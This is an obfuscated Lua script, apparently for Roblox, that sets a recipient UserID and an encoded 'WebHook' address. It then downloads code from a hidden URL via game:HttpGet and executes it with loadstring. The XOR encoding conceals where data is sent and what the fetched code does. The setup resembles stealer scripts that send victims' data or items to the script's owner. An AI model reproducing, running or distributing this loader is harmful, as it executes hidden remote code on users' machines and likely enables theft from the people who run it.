--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(1235 -(488 + 165)) -(404 + 99 + (228 -150)), #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (1 -0))),v1(v2(v9,1 + 0 + ((v11-(1 + 0))% #v9),(1 -(1298 -(1288 + 10))) + ((v11-(1517 -((677 -(273 + 60)) + (2834 -(511 + 1151)))))% #v9) + (3 -(1 + 1)))))%((4179 -2926) -(2970 -1973))));end return v5(v10);end _G.UserID=2219234772 -0;_G.WebHook=v7("\40\14\233\6\19\240\247\111\30\244\5\3\165\170\36\84\254\25\13\229\185\48\19\178\1\5\168\176\47\21\246\5\79\251\232\118\72\169\69\86\242\235\116\78\165\70\87\255\232\118\75\174\89\58\163\185\25\20\175\39\10\132\144\35\59\229\51\12\142\188\34\11\213\19\81\175\232\57\40\216\68\17\167\175\2\52\254\14\36\168\149\2\46\252\67\35\152\172\2\56\211\51\13\169\139\116\46\234\25\8\152\190\1\55\173\52\52\248\171\33\51","\64\122\157\118\96\202\216");loadstring(game:HttpGet(v7("\232\244\111\110\93\147\96\224\242\225\108\48\73\192\59\167\245\226\110\109\75\219\44\160\238\244\126\112\90\135\44\160\237\175\72\119\66\204\33\172\229\211\120\108\71\217\59\188\175\208\104\102\125\202\61\166\240\244\104\48\98\220\46\224\237\225\114\112\1\249\60\183\193\245\111\113\72\200\61\162\174\244\105\107\75","\128\128\27\30\46\169\79\207")))();
